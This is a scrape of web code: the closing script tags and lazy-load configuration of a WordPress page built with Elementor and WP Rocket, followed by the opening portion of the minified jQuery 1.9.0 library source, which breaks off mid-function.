= {"break_point":"921","isRtl":""}; /* ]]> */</script> <script type='text/javascript' src='https://www.livingchirpy.com/wp-content/cache/busting/1/wp-content/themes/astra/assets/js/minified/style.min-1.8.3.js' defer></script> <script type='text/javascript'>var quicklinkOptions = {"el":"","urls":[],"timeout":2000,"timeoutFn":"requestIdleCallback","priority":false,"origins":["www.livingchirpy.com"],"ignores":["feed\\=","\\\/feed\\\/","^https?:\\\/\\\/[^\\\/]+\\\/(#.*)?$","^https\\:\\\/\\\/www\\.livingchirpy\\.com\\\/wp\\-admin\\\/","^https\\:\\\/\\\/www\\.livingchirpy\\.com[^?#]+\\.php","\\\/wp\\-content"]};</script> <script type='text/javascript' src='https://www.livingchirpy.com/wp-content/cache/busting/1/wp-content/plugins/quicklink/quicklink.min-0.5.0.js' async></script> <script type='text/javascript' src='https://www.livingchirpy.com/wp-content/cache/busting/1/wp-includes/js/jquery/jquery-1.12.4.js'></script> <script type='text/javascript' src='https://www.livingchirpy.com/wp-content/cache/busting/1/wp-includes/js/jquery/jquery-migrate.min-1.4.1.js' defer></script> <script type='text/javascript' src='https://www.livingchirpy.com/wp-content/cache/busting/1/wp-content/plugins/elementor-pro/assets/lib/smartmenus/jquery.smartmenus.min-1.0.1.js' defer></script> <script type='text/javascript' src='https://www.livingchirpy.com/wp-content/cache/busting/1/wp-includes/js/imagesloaded.min-3.2.0.js' defer></script> <script type='text/javascript' src='https://www.livingchirpy.com/wp-content/cache/busting/1/wp-content/plugins/elementor/assets/js/frontend-modules.min-2.5.15.js' defer></script> <script type='text/javascript' src='https://www.livingchirpy.com/wp-content/cache/busting/1/wp-content/plugins/elementor-pro/assets/lib/sticky/jquery.sticky.min-2.5.8.js' defer></script> <script type='text/javascript'>var ElementorProFrontendConfig = {"ajaxurl":"https:\/\/www.livingchirpy.com\/wp-admin\/admin-ajax.php","nonce":"711e72f9bb","shareButtonsNetworks":{"facebook":{"title":"Facebook","has_counter":true},"twitter":{"title":"Twitter"},"google":{"title":"Google+","has_counter":true},"linkedin":{"title":"LinkedIn","has_counter":true},"pinterest":{"title":"Pinterest","has_counter":true},"reddit":{"title":"Reddit","has_counter":true},"vk":{"title":"VK","has_counter":true},"odnoklassniki":{"title":"OK","has_counter":true},"tumblr":{"title":"Tumblr"},"delicious":{"title":"Delicious"},"digg":{"title":"Digg"},"skype":{"title":"Skype"},"stumbleupon":{"title":"StumbleUpon","has_counter":true},"telegram":{"title":"Telegram"},"pocket":{"title":"Pocket","has_counter":true},"xing":{"title":"XING","has_counter":true},"whatsapp":{"title":"WhatsApp"},"email":{"title":"Email"},"print":{"title":"Print"}},"facebook_sdk":{"lang":"en_US","app_id":""}};</script> <script type='text/javascript' src='https://www.livingchirpy.com/wp-content/cache/busting/1/wp-content/plugins/elementor-pro/assets/js/frontend.min-2.5.8.js' defer></script> <script type='text/javascript' src='https://www.livingchirpy.com/wp-content/cache/busting/1/wp-includes/js/jquery/ui/position.min-1.11.4.js' defer></script> <script type='text/javascript' src='https://www.livingchirpy.com/wp-content/cache/busting/1/wp-content/plugins/elementor/assets/lib/dialog/dialog.min-4.7.1.js' defer></script> <script type='text/javascript' src='https://www.livingchirpy.com/wp-content/cache/busting/1/wp-content/plugins/elementor/assets/lib/waypoints/waypoints.min-4.0.2.js' defer></script> <script type='text/javascript' src='https://www.livingchirpy.com/wp-content/cache/busting/1/wp-content/plugins/elementor/assets/lib/swiper/swiper.min-4.4.6.js' defer></script> <script type='text/javascript'>var elementorFrontendConfig = {"environmentMode":{"edit":false,"wpPreview":false},"is_rtl":false,"breakpoints":{"xs":0,"sm":480,"md":768,"lg":1025,"xl":1440,"xxl":1600},"version":"2.5.15","urls":{"assets":"https:\/\/www.livingchirpy.com\/wp-content\/plugins\/elementor\/assets\/"},"settings":{"page":[],"general":{"elementor_global_image_lightbox":"yes","elementor_enable_lightbox_in_editor":"yes"}},"post":{"id":8377,"title":"Home","excerpt":""}};</script> <script type='text/javascript' src='https://www.livingchirpy.com/wp-content/cache/busting/1/wp-content/plugins/elementor/assets/js/frontend.min-2.5.15.js' defer></script> <script>/(trident|msie)/i.test(navigator.userAgent)&&document.getElementById&&window.addEventListener&&window.addEventListener("hashchange",function(){var t,e=location.hash.substring(1);/^[A-z0-9_-]+$/.test(e)&&(t=document.getElementById(e))&&(/^(?:a|select|input|button|textarea)$/i.test(t.tagName)||(t.tabIndex=-1),t.focus())},!1);</script> <script type="text/javascript">var swp_nonce = "bbfad10e22";var swpFloatBeforeContent = false;var swpClickTracking = false; swpPinIt={"enabled":false};</script><script>window.lazyLoadOptions = { elements_selector: "img[data-lazy-src],.rocket-lazyload,iframe[data-lazy-src]", data_src: "lazy-src", data_srcset: "lazy-srcset", data_sizes: "lazy-sizes", class_loading: "lazyloading", class_loaded: "lazyloaded", threshold: 300, callback_loaded: function(element) { if ( element.tagName === "IFRAME" && element.dataset.rocketLazyload == "fitvidscompatible" ) { if (element.classList.contains("lazyloaded") ) { if (typeof window.jQuery != "undefined") { if (jQuery.fn.fitVids) { jQuery(element).parent().fitVids(); } } } } }}; window.addEventListener('LazyLoad::Initialized', function (e) { var lazyLoadInstance = e.detail.instance; if (window.MutationObserver) { var observer = new MutationObserver(function(mutations) { mutations.forEach(function(mutation) { for (i = 0; i < mutation.addedNodes.length; i++) { if (typeof mutation.addedNodes[i].getElementsByTagName !== 'function') { return; } if (typeof mutation.addedNodes[i].getElementsByClassName !== 'function') { return; } imgs = mutation.addedNodes[i].getElementsByTagName('img'); iframes = mutation.addedNodes[i].getElementsByTagName('iframe'); rocket_lazy = mutation.addedNodes[i].getElementsByClassName('rocket-lazyload'); if ( 0 === imgs.length && 0 === iframes.length && 0 === rocket_lazy.length ) { return; } lazyLoadInstance.update(); } } ); } ); var b = document.getElementsByTagName("body")[0]; var config = { childList: true, subtree: true }; observer.observe(b, config); } }, false);</script><script data-no-minify="1" async src="https://www.livingchirpy.com/wp-content/plugins/wp-rocket/assets/js/lazyload/11.0.6/lazyload.min.js"></script><script>function lazyLoadThumb(e){var t='<img data-lazy-src="https://i.ytimg.com/vi/ID/hqdefault.jpg" width="480" height="360"><noscript><img src="https://i.ytimg.com/vi/ID/hqdefault.jpg" width="480" height="360"></noscript>',a='<div class="play"></div>';return t.replace("ID",e)+a}function lazyLoadYoutubeIframe(){var e=document.createElement("iframe"),t="https://www.youtube.com/embed/ID?autoplay=1";t+=0===this.dataset.query.length?'':'&'+this.dataset.query;e.setAttribute("src",t.replace("ID",this.dataset.id)),e.setAttribute("frameborder","0"),e.setAttribute("allowfullscreen","1"),this.parentNode.replaceChild(e,this)}document.addEventListener("DOMContentLoaded",function(){var e,t,a=document.getElementsByClassName("rll-youtube-player");for(t=0;t<a.length;t++)e=document.createElement("div"),e.setAttribute("data-id",a[t].dataset.id),e.setAttribute("data-query", a[t].dataset.query),e.innerHTML=lazyLoadThumb(a[t].dataset.id),e.onclick=lazyLoadYoutubeIframe,a[t].appendChild(e)});</script> </body></html> <!-- This website is like a Rocket, isn't it? Performance optimized by WP Rocket. Learn more: https://wp-rocket.me - Debug: cached@1558019708 -->
0
/* * jQuery JavaScript Library v1.9.0 * http://jquery.com/ * * Includes Sizzle.js * http://sizzlejs.com/ * * Copyright 2005, 2012 jQuery Foundation, Inc. and other contributors * Released under the MIT license * http://jquery.org/license * * Date: 2013-1-14 */ (function(bU,bS){var bi,aR,V=bU.document,ax=bU.location,b=bU.jQuery,a=bU.$,t={},w=[],F="1.9.0",v=w.concat,A=w.push,C=w.slice,y=w.indexOf,D=t.toString,x=t.hasOwnProperty,E=F.trim,aw=function(b1,e){return new aw.fn.init(b1,e,bi)},z=/[+-]?(?:\d*\.|)\d+(?:[eE][+-]?\d+|)/.source,B=/\S+/g,by=/^[\s\uFEFF\xA0]+|[\s\uFEFF\xA0]+$/g,bn=/^(?:(<[\w\W]+>)[^>]*|#([\w-]*))$/,bt=/^<(\w+)\s*\/?>(?:<\/\1>|)$/,bF=/^[\],:{}\s]*$/,bE=/(?:^|:|,)(?:\s*\[)+/g,bG=/\\(?:["\\\/bfnrt]|u[\da-fA-F]{4})/g,bH=/"[^"\\\r\n]*"|true|false|null|-?(?:\d+\.|)\d+(?:[eE][+-]?\d+|)/g,ba=/^-ms-/,aP=/-([\da-z])/gi,Z=function(e,b1){return b1.toUpperCase()},W=function(){if(V.addEventListener){V.removeEventListener("DOMContentLoaded",W,false);aw.ready()}else{if(V.readyState==="complete"){V.detachEvent("onreadystatechange",W);aw.ready()}}};aw.fn=aw.prototype={jquery:F,constructor:aw,init:function(b4,e,b3){var b2,b1;if(!b4){return this}if(typeof b4==="string"){if(b4.charAt(0)==="<"&&b4.charAt(b4.length-1)===">"&&b4.length>=3){b2=[null,b4,null]}else{b2=bn.exec(b4)}if(b2&&(b2[1]||!e)){if(b2[1]){e=e instanceof aw?e[0]:e;aw.merge(this,aw.parseHTML(b2[1],e&&e.nodeType?e.ownerDocument||e:V,true));if(bt.test(b2[1])&&aw.isPlainObject(e)){for(b2 in e){if(aw.isFunction(this[b2])){this[b2](e[b2])}else{this.attr(b2,e[b2])}}}return this}else{b1=V.getElementById(b2[2]);if(b1&&b1.parentNode){if(b1.id!==b2[2]){return b3.find(b4)}this.length=1;this[0]=b1}this.context=V;this.selector=b4;return this}}else{if(!e||e.jquery){return(e||b3).find(b4)}else{return this.constructor(e).find(b4)}}}else{if(b4.nodeType){this.context=this[0]=b4;this.length=1;return this}else{if(aw.isFunction(b4)){return b3.ready(b4)}}}if(b4.selector!==bS){this.selector=b4.selector;this.context=b4.context}return aw.makeArray(b4,this)},selector:"",length:0,size:function(){return this.length},toArray:function(){return C.call(this)},get:function(e){return e==null?this.toArray():(e<0?this[this.length+e]:this[e])},pushStack:function(e){var b1=aw.merge(this.constructor(),e);b1.prevObject=this;b1.context=this.context;return b1},each:function(b1,e){return aw.each(this,b1,e)},ready:function(e){aw.ready.promise().done(e);return this},slice:function(){return this.pushStack(C.apply(this,arguments))},first:function(){return this.eq(0)},last:function(){return this.eq(-1)},eq:function(e){var b2=this.length,b1=+e+(e<0?b2:0);return this.pushStack(b1>=0&&b1<b2?[this[b1]]:[])},map:function(e){return this.pushStack(aw.map(this,function(b1,b2){return e.call(b1,b2,b1)}))},end:function(){return this.prevObject||this.constructor(null)},push:A,sort:[].sort,splice:[].splice};aw.fn.init.prototype=aw.fn;aw.extend=aw.fn.extend=function(){var b7,b6,b8,b1,b2,e,b9=arguments[0]||{},b4=1,b5=arguments.length,b3=false;if(typeof b9==="boolean"){b3=b9;b9=arguments[1]||{};b4=2}if(typeof b9!=="object"&&!aw.isFunction(b9)){b9={}}if(b5===b4){b9=this;--b4}for(;b4<b5;b4++){if((b7=arguments[b4])!=null){for(b6 in b7){b8=b9[b6];b1=b7[b6];if(b9===b1){continue}if(b3&&b1&&(aw.isPlainObject(b1)||(b2=aw.isArray(b1)))){if(b2){b2=false;e=b8&&aw.isArray(b8)?b8:[]}else{e=b8&&aw.isPlainObject(b8)?b8:{}}b9[b6]=aw.extend(b3,e,b1)}else{if(b1!==bS){b9[b6]=b1}}}}}return b9};aw.extend({noConflict:function(e){if(bU.$===aw){bU.$=a}if(e&&bU.jQuery===aw){bU.jQuery=b}return aw},isReady:false,readyWait:1,holdReady:function(e){if(e){aw.readyWait++}else{aw.ready(true)}},ready:function(e){if(e===true?--aw.readyWait:aw.isReady){return}if(!V.body){return setTimeout(aw.ready)}aw.isReady=true;if(e!==true&&--aw.readyWait>0){return}aR.resolveWith(V,[aw]);if(aw.fn.trigger){aw(V).trigger("ready").off("ready")}},isFunction:function(e){return aw.type(e)==="function"},isArray:Array.isArray||function(e){return aw.type(e)==="array"},isWindow:function(e){return e!=null&&e==e.window},isNumeric:function(e){return !isNaN(parseFloat(e))&&isFinite(e)},type:function(e){if(e==null){return String(e)}return typeof e==="object"||typeof e==="function"?t[D.call(e)]||"object":typeof e},isPlainObject:function(b3){if(!b3||aw.type(b3)!=="object"||b3.nodeType||aw.isWindow(b3)){return false}try{if(b3.constructor&&!x.call(b3,"constructor")&&!x.call(b3.constructor.prototype,"isPrototypeOf")){return false}}catch(b1){return false}var b2;for(b2 in b3){}return b2===bS||x.call(b3,b2)},isEmptyObject:function(b1){var e;for(e in b1){return false}return true},error:function(e){throw new Error(e)},parseHTML:function(b1,e,b2){if(!b1||typeof b1!=="string"){return null}if(typeof e==="boolean"){b2=e;e=false}e=e||V;var b3=bt.exec(b1),b4=!b2&&[];if(b3){return[e.createElement(b3[1])]}b3=aw.buildFragment([b1],e,b4);if(b4){aw(b4).remove()}return aw.merge([],b3.childNodes)},parseJSON:function(e){if(bU.JSON&&bU.JSON.parse){return bU.JSON.parse(e)}if(e===null){return e}if(typeof e==="string"){e=aw.trim(e);if(e){if(bF.test(e.replace(bG,"@").replace(bH,"]").replace(bE,""))){return(new Function("return "+e))()}}}aw.error("Invalid JSON: "+e)},parseXML:function(b1){var b4,b3;if(!b1||typeof b1!=="string"){return null}try{if(bU.DOMParser){b3=new DOMParser();b4=b3.parseFromString(b1,"text/xml")}else{b4=new ActiveXObject("Microsoft.XMLDOM");b4.async="false";b4.loadXML(b1)}}catch(b2){b4=bS}if(!b4||!b4.documentElement||b4.getElementsByTagName("parsererror").length){aw.error("Invalid XML: "+b1)}return b4},noop:function(){},globalEval:function(e){if(e&&aw.trim(e)){(bU.execScript||function(b1){bU["eval"].call(bU,b1)})(e)}},camelCase:function(e){return e.replace(ba,"ms-").replace(aP,Z)},nodeName:function(e,b1){return e.nodeName&&e.nodeName.toLowerCase()===b1.toLowerCase()},each:function(b5,b1,e){var b6,b2=0,b4=b5.length,b3=ar(b5);if(e){if(b3){for(;b2<b4;b2++){b6=b1.apply(b5[b2],e);if(b6===false){break}}}else{for(b2 in b5){b6=b1.apply(b5[b2],e);if(b6===false){break}}}}else{if(b3){for(;b2<b4;b2++){b6=b1.call(b5[b2],b2,b5[b2]);if(b6===false){break}}}else{for(b2 in b5){b6=b1.call(b5[b2],b2,b5[b2]);if(b6===false){break}}}}return b5},trim:E&&!E.call("\uFEFF\xA0")?function(e){return e==null?"":E.call(e)}:function(e){return e==null?"":(e+"").replace(by,"")},makeArray:function(e,b1){var b2=b1||[];if(e!=null){if(ar(Object(e))){aw.merge(b2,typeof e==="string"?[e]:e)}else{A.call(b2,e)}}return b2},inArray:function(b1,e,b2){var b3;if(e){if(y){return y.call(e,b1,b2)}b3=e.length;b2=b2?b2<0?Math.max(0,b3+b2):b2:0;for(;b2<b3;b2++){if(b2 in e&&e[b2]===b1){return b2}}}return -1},merge:function(e,b4){var b3=b4.length,b1=e.length,b2=0;if(typeof b3==="number"){for(;b2<b3;b2++){e[b1++]=b4[b2]}}else{while(b4[b2]!==bS){e[b1++]=b4[b2++]}}e.length=b1;return e},grep:function(b1,e,b3){var b6,b5=[],b2=0,b4=b1.length;b3=!!b3;for(;b2<b4;b2++){b6=!!e(b1[b2],b2);if(b3!==b6){b5.push(b1[b2])}}return b5},map:function(b2,b1,e){var b7,b3=0,b5=b2.length,b4=ar(b2),b6=[];if(b4){for(;b3<b5;b3++){b7=b1(b2[b3],b3,e);if(b7!=null){b6[b6.length]=b7}}}else{for(b3 in b2){b7=b1(b2[b3],b3,e);if(b7!=null){b6[b6.length]=b7}}}return v.apply([],b6)},guid:1,proxy:function(b2,b1){var b4,e,b3;if(typeof b1==="string"){b4=b2[b1];b1=b2;b2=b4}if(!aw.isFunction(b2)){return bS}e=C.call(arguments,2);b3=function(){return b2.apply(b1||this,e.concat(C.call(arguments)))};b3.guid=b2.guid=b2.guid||aw.guid++;return b3},access:function(b2,b4,b6,b9,b1,b3,b8){var b5=0,b7=b2.length,e=b6==null;if(aw.type(b6)==="object"){b1=true;for(b5 in b6){aw.access(b2,b4,b5,b6[b5],true,b3,b8)}}else{if(b9!==bS){b1=true;if(!aw.isFunction(b9)){b8=true}if(e){if(b8){b4.call(b2,b9);b4=null}else{e=b4;b4=function(ca,cb,cc){return e.call(aw(ca),cc)}}}if(b4){for(;b5<b7;b5++){b4(b2[b5],b6,b8?b9:b9.call(b2[b5],b5,b4(b2[b5],b6)))}}}}return b1?b2:e?b4.call(b2):b7?b4(b2[0],b6):b3},now:function(){return(new Date()).getTime()}});aw.ready.promise=function(b3){if(!aR){aR=aw.Deferred();if(V.readyState==="complete"){setTimeout(aw.ready)}else{if(V.addEventListener){V.addEventListener("DOMContentLoaded",W,false);bU.addEventListener("load",aw.ready,false)}else{V.attachEvent("onreadystatechange",W);bU.attachEvent("onload",aw.ready);var b4=false;try{b4=bU.frameElement==null&&V.documentElement}catch(b2){}if(b4&&b4.doScroll){(function b1(){if(!aw.isReady){try{b4.doScroll("left")}catch(b5){return setTimeout(b1,50)}aw.ready()}})()}}}}return aR.promise(b3)};aw.each("Boolean Number String Function Array Date RegExp Object Error".split(" "),function(e,b1){t["[object "+b1+"]"]=b1.toLowerCase()});function ar(b1){var e=b1.length,b2=aw.type(b1);if(aw.isWindow(b1)){return false}if(b1.nodeType===1&&e){return true}return b2==="array"||b2!=="function"&&(e===0||typeof e==="number"&&e>0&&(e-1) in b1)}bi=aw(V);var aC={};function I(b1){var e=aC[b1]={};aw.each(b1.match(B)||[],function(b2,b3){e[b3]=true});return e}aw.Callbacks=function(b8){b8=typeof b8==="string"?(aC[b8]||I(b8)):aw.extend({},b8);var b7,b1,b2,b5,b4,b3,b6=[],ca=!b8.once&&[],e=function(cb){b7=b8.memory&&cb;b1=true;b3=b5||0;b5=0;b4=b6.length;b2=true;for(;b6&&b3<b4;b3++){if(b6[b3].apply(cb[0],cb[1])===false&&b8.stopOnFalse){b7=false;break}}b2=false;if(b6){if(ca){if(ca.length){e(ca.shift())}}else{if(b7){b6=[]}else{b9.disable()}}}},b9={add:function(){if(b6){var cc=b6.length;(function cb(cd){aw.each(cd,function(ce,cf){var cg=aw.type(cf);if(cg==="function"){if(!b8.unique||!b9.has(cf)){b6.push(cf)}}else{if(cf&&cf.length&&cg!=="string"){cb(cf)}}})})(arguments);if(b2){b4=b6.length}else{if(b7){b5=cc;e(b7)}}}return this},remove:function(){if(b6){aw.each(arguments,function(cb,cc){var cd;while((cd=aw.inArray(cc,b6,cd))>-1){b6.splice(cd,1);if(b2){if(cd<=b4){b4--}if(cd<=b3){b3--}}}})}return this},has:function(cb){return aw.inArray(cb,b6)>-1},empty:function(){b6=[];return this},disable:function(){b6=ca=b7=bS;return this},disabled:function(){return !b6},lock:function(){ca=bS;if(!b7){b9.disable()}return this},locked:function(){return !ca},fireWith:function(cc,cb){cb=cb||[];cb=[cc,cb.slice?cb.slice():cb];if(b6&&(!b1||ca)){if(b2){ca.push(cb)}else{e(cb)}}return this},fire:function(){b9.fireWith(this,arguments);return this},fired:function(){return !!b1}};return b9};aw.extend({Deferred:function(b1){var b4=[["resolve","done",aw.Callbacks("once memory"),"resolved"],["reject","fail",aw.Callbacks("once memory"),"rejected"],["notify","progress",aw.Callbacks("memory")]],b3="pending",b2={state:function(){return b3},always:function(){e.done(arguments).fail(arguments);return this},then:function(){var b5=arguments;return aw.Deferred(function(b6){aw.each(b4,function(b9,ca){var b7=ca[0],b8=aw.isFunction(b5[b9])&&b5[b9];e[ca[1]](function(){var cb=b8&&b8.apply(this,arguments);if(cb&&aw.isFunction(cb.promise)){cb.promise().done(b6.resolve).fail(b6.reject).progress(b6.notify)}else{b6[b7+"With"](this===b2?b6.promise():this,b8?[cb]:arguments)}})});b5=null}).promise()},promise:function(b5){return b5!=null?aw.extend(b5,b2):b2}},e={};b2.pipe=b2.then;aw.each(b4,function(b5,b8){var b6=b8[2],b7=b8[3];b2[b8[1]]=b6.add;if(b7){b6.add(function(){b3=b7},b4[b5^1][2].disable,b4[2][2].lock)}e[b8[0]]=function(){e[b8[0]+"With"](this===e?b2:this,arguments);return this};e[b8[0]+"With"]=b6.fireWith});b2.promise(e);if(b1){b1.call(e,e)}return e},when:function(b8){var b1=0,b7=C.call(arguments),b2=b7.length,b5=b2!==1||(b8&&aw.isFunction(b8.promise))?b2:0,e=b5===1?b8:aw.Deferred(),b9=function(cb,ca,cc){return function(cd){ca[cb]=this;cc[cb]=arguments.length>1?C.call(arguments):cd;if(cc===b4){e.notifyWith(ca,cc)}else{if(!(--b5)){e.resolveWith(ca,cc)}}}},b4,b3,b6;if(b2>1){b4=new Array(b2);b3=new Array(b2);b6=new Array(b2);for(;b1<b2;b1++){if(b7[b1]&&aw.isFunction(b7[b1].promise)){b7[b1].promise().done(b9(b1,b6,b7)).fail(e.reject).progress(b9(b1,b3,b4))}else{--b5}}}if(!b5){e.resolveWith(b6,b7)}return e.promise()}});aw.support=(function(){var cc,b2,b1,cb,ca,b8,b6,b5,b9,b7,b3=V.createElement("div");b3.setAttribute("className","t");b3.innerHTML=" <link/><table></table><a href='/a'>a</a><input type='checkbox'/>";b2=b3.getElementsByTagName("*");b1=b3.getElementsByTagName("a")[0];if(!b2||!b1||!b2.length){return{}}cb=V.createElement("select");ca=cb.appendChild(V.createElement("option"));b8=b3.getElementsByTagName("input")[0];b1.style.cssText="top:1px;float:left;opacity:.5";cc={getSetAttribute:b3.className!=="t",leadingWhitespace:b3.firstChild.nodeType===3,tbody:!b3.getElementsByTagName("tbody").length,htmlSerialize:!!b3.getElementsByTagName("link").length,style:/top/.test(b1.getAttribute("style")),hrefNormalized:b1.getAttribute("href")==="/a",opacity:/^0.5/.test(b1.style.opacity),cssFloat:!!b1.style.cssFloat,checkOn:!!b8.value,optSelected:ca.selected,enctype:!!V.createElement("form").enctype,html5Clone:V.createElement("nav").cloneNode(true).outerHTML!=="<:nav></:nav>",boxModel:V.compatMode==="CSS1Compat",deleteExpando:true,noCloneEvent:true,inlineBlockNeedsLayout:false,shrinkWrapBlocks:false,reliableMarginRight:true,boxSizingReliable:true,pixelPosition:false};b8.checked=true;cc.noCloneChecked=b8.cloneNode(true).checked;cb.disabled=true;cc.optDisabled=!ca.disabled;try{delete b3.test}catch(b4){cc.deleteExpando=false}b8=V.createElement("input");b8.setAttribute("value","");cc.input=b8.getAttribute("value")==="";b8.value="t";b8.setAttribute("type","radio");cc.radioValue=b8.value==="t";b8.setAttribute("checked","t");b8.setAttribute("name","t");b6=V.createDocumentFragment();b6.appendChild(b8);cc.appendChecked=b8.checked;cc.checkClone=b6.cloneNode(true).cloneNode(true).lastChild.checked;if(b3.attachEvent){b3.attachEvent("onclick",function(){cc.noCloneEvent=false});b3.cloneNode(true).click()}for(b7 in {submit:true,change:true,focusin:true}){b3.setAttribute(b5="on"+b7,"t");cc[b7+"Bubbles"]=b5 in bU||b3.attributes[b5].expando===false}b3.style.backgroundClip="content-box";b3.cloneNode(true).style.backgroundClip="";cc.clearCloneStyle=b3.style.backgroundClip==="content-box";aw(function(){var cd,cf,cg,ce="padding:0;margin:0;border:0;display:block;box-sizing:content-box;-moz-box-sizing:content-box;-webkit-box-sizing:content-box;",e=V.getElementsByTagName("body")[0];if(!e){return}cd=V.createElement("div");cd.style.cssText="border:0;width:0;height:0;position:absolute;top:0;left:-9999px;margin-top:1px";e.appendChild(cd).appendChild(b3);b3.innerHTML="<table><tr><td></td><td>t</td></tr></table>";cg=b3.getElementsByTagName("td");cg[0].style.cssText="padding:0;margin:0;border:0;display:none";b9=(cg[0].offsetHeight===0);cg[0].style.display="";cg[1].style.display="none";cc.reliableHiddenOffsets=b9&&(cg[0].offsetHeight===0);b3.innerHTML="";b3.style.cssText="box-sizing:border-box;-moz-box-sizing:border-box;-webkit-box-sizing:border-box;padding:1px;border:1px;display:block;width:4px;margin-top:1%;position:absolute;top:1%;";cc.boxSizing=(b3.offsetWidth===4);cc.doesNotIncludeMarginInBodyOffset=(e.offsetTop!==1);if(bU.getComputedStyle){cc.pixelPosition=(bU.getComputedStyle(b3,null)||{}).top!=="1%";cc.boxSizingReliable=(bU.getComputedStyle(b3,null)||{width:"4px"}).width==="4px";cf=b3.appendChild(V.createElement("div"));cf.style.cssText=b3.style.cssText=ce;cf.style.marginRight=cf.style.width="0";b3.style.width="1px";cc.reliableMarginRight=!parseFloat((bU.getComputedStyle(cf,null)||{}).marginRight)}if(typeof b3.style.zoom!=="undefined"){b3.innerHTML="";b3.style.cssText=ce+"width:1px;padding:1px;display:inline;zoom:1";cc.inlineBlockNeedsLayout=(b3.offsetWidth===3);b3.style.display="block";b3.innerHTML="<div></div>";b3.firstChild.style.width="5px";cc.shrinkWrapBlocks=(b3.offsetWidth!==3);e.style.zoom=1}e.removeChild(cd);cd=b3=cg=cf=null});b2=cb=b6=ca=b1=b8=null;return cc})();var aI=/(?:\{[\s\S]*\}|\[[\s\S]*\])$/,bb=/([A-Z])/g;function ap(b2,b7,b1,b8){if(!aw.acceptData(b2)){return}var ca,b9,b5=aw.expando,b3=typeof b7==="string",b6=b2.nodeType,e=b6?aw.cache:b2,b4=b6?b2[b5]:b2[b5]&&b5;if((!b4||!e[b4]||(!b8&&!e[b4].data))&&b3&&b1===bS){return}if(!b4){if(b6){b2[b5]=b4=w.pop()||aw.guid++}else{b4=b5}}if(!e[b4]){e[b4]={};if(!b6){e[b4].toJSON=aw.noop}}if(typeof b7==="object"||typeof b7==="function"){if(b8){e[b4]=aw.extend(e[b4],b7)}else{e[b4].data=aw.extend(e[b4].data,b7)}}ca=e[b4];if(!b8){if(!ca.data){ca.data={}}ca=ca.data}if(b1!==bS){ca[aw.camelCase(b7)]=b1}if(b3){b9=ca[b7];if(b9==null){b9=ca[aw.camelCase(b7)]}}else{b9=ca}return b9}function aq(b1,b6,b7){if(!aw.acceptData(b1)){return}var b8,b2,b5,b4=b1.nodeType,e=b4?aw.cache:b1,b3=b4?b1[aw.expando]:aw.expando;if(!e[b3]){return}if(b6){b8=b7?e[b3]:e[b3].data;if(b8){if(!aw.isArray(b6)){if(b6 in b8){b6=[b6]}else{b6=aw.camelCase(b6);if(b6 in b8){b6=[b6]}else{b6=b6.split(" ")}}}else{b6=b6.concat(aw.map(b6,aw.camelCase))}for(b2=0,b5=b6.length;b2<b5;b2++){delete b8[b6[b2]]}if(!(b7?at:aw.isEmptyObject)(b8)){return}}}if(!b7){delete e[b3].data;if(!at(e[b3])){return}}if(b4){aw.cleanData([b1],true)}else{if(aw.support.deleteExpando||e!=e.window){delete e[b3]}else{e[b3]=null}}}aw.extend({cache:{},expando:"jQuery"+(F+Math.random()).replace(/\D/g,""),noData:{embed:true,object:"clsid:D27CDB6E-AE6D-11cf-96B8-444553540000",applet:true},hasData:function(e){e=e.nodeType?aw.cache[e[aw.expando]]:e[aw.expando];return !!e&&!at(e)},data:function(b1,b2,e){return ap(b1,b2,e,false)},removeData:function(e,b1){return aq(e,b1,false)},_data:function(b1,b2,e){return ap(b1,b2,e,true)},_removeData:function(e,b1){return aq(e,b1,true)},acceptData:function(e){var b1=e.nodeName&&aw.noData[e.nodeName.toLowerCase()];return !b1||b1!==true&&e.getAttribute("classid")===b1}});aw.fn.extend({data:function(b4,b6){var e,b5,b2=this[0],b3=0,b1=null;if(b4===bS){if(this.length){b1=aw.data(b2);if(b2.nodeType===1&&!aw._data(b2,"parsedAttrs")){e=b2.attributes;for(;b3<e.length;b3++){b5=e[b3].name;if(!b5.indexOf("data-")){b5=aw.camelCase(b5.substring(5));S(b2,b5,b1[b5])}}aw._data(b2,"parsedAttrs",true)}}return b1}if(typeof b4==="object"){return this.each(function(){aw.data(this,b4)})}return aw.access(this,function(b7){if(b7===bS){return b2?S(b2,b4,aw.data(b2,b4)):null}this.each(function(){aw.data(this,b4,b7)})},null,b6,arguments.length>1,null,true)},removeData:function(e){return this.each(function(){aw.removeData(this,e)})}});function S(b3,b4,b1){if(b1===bS&&b3.nodeType===1){var b5="data-"+b4.replace(bb,"-$1").toLowerCase();b1=b3.getAttribute(b5);if(typeof b1==="string"){try{b1=b1==="true"?true:b1==="false"?false:b1==="null"?null:+b1+""===b1?+b1:aI.test(b1)?aw.parseJSON(b1):b1}catch(b2){}aw.data(b3,b4,b1)}else{b1=bS}}return b1}function at(b1){var e;for(e in b1){if(e==="data"&&aw.isEmptyObject(b1[e])){continue}if(e!=="toJSON"){return false}}return true}aw.extend({queue:function(b1,b3,e){var b2;if(b1){b3=(b3||"fx")+"queue";b2=aw._data(b1,b3);if(e){if(!b2||aw.isArray(e)){b2=aw._data(b1,b3,aw.makeArray(e))}else{b2.push(e)}}return b2||[]}},dequeue:function(e,b6){b6=b6||"fx";var b4=aw.queue(e,b6),b5=b4.length,b1=b4.shift(),b2=aw._queueHooks(e,b6),b3=function(){aw.dequeue(e,b6)};if(b1==="inprogress"){b1=b4.shift();b5--}b2.cur=b1;if(b1){if(b6==="fx"){b4.unshift("inprogress")}delete b2.stop;b1.call(e,b3,b2)}if(!b5&&b2){b2.empty.fire()}},_queueHooks:function(e,b2){var b1=b2+"queueHooks";return aw._data(e,b1)||aw._data(e,b1,{empty:aw.Callbacks("once memory").add(function(){aw._removeData(e,b2+"queue");aw._removeData(e,b1)})})}});aw.fn.extend({queue:function(b2,e){var b1=2;if(typeof b2!=="string"){e=b2;b2="fx";b1--}if(arguments.length<b1){return aw.queue(this[0],b2)}return e===bS?this:this.each(function(){var b3=aw.queue(this,b2,e);aw._queueHooks(this,b2);if(b2==="fx"&&b3[0]!=="inprogress"){aw.dequeue(this,b2)}})},dequeue:function(e){return this.each(function(){aw.dequeue(this,e)})},delay:function(e,b1){e=aw.fx?aw.fx.speeds[e]||e:e;b1=b1||"fx";return this.queue(b1,function(b3,b2){var b4=setTimeout(b3,e);b2.stop=function(){clearTimeout(b4)}})},clearQueue:function(e){return this.queue(e||"fx",[])},promise:function(b7,b4){var b6,e=1,b1=aw.Deferred(),b2=this,b3=this.length,b5=function(){if(!(--e)){b1.resolveWith(b2,[b2])}};if(typeof 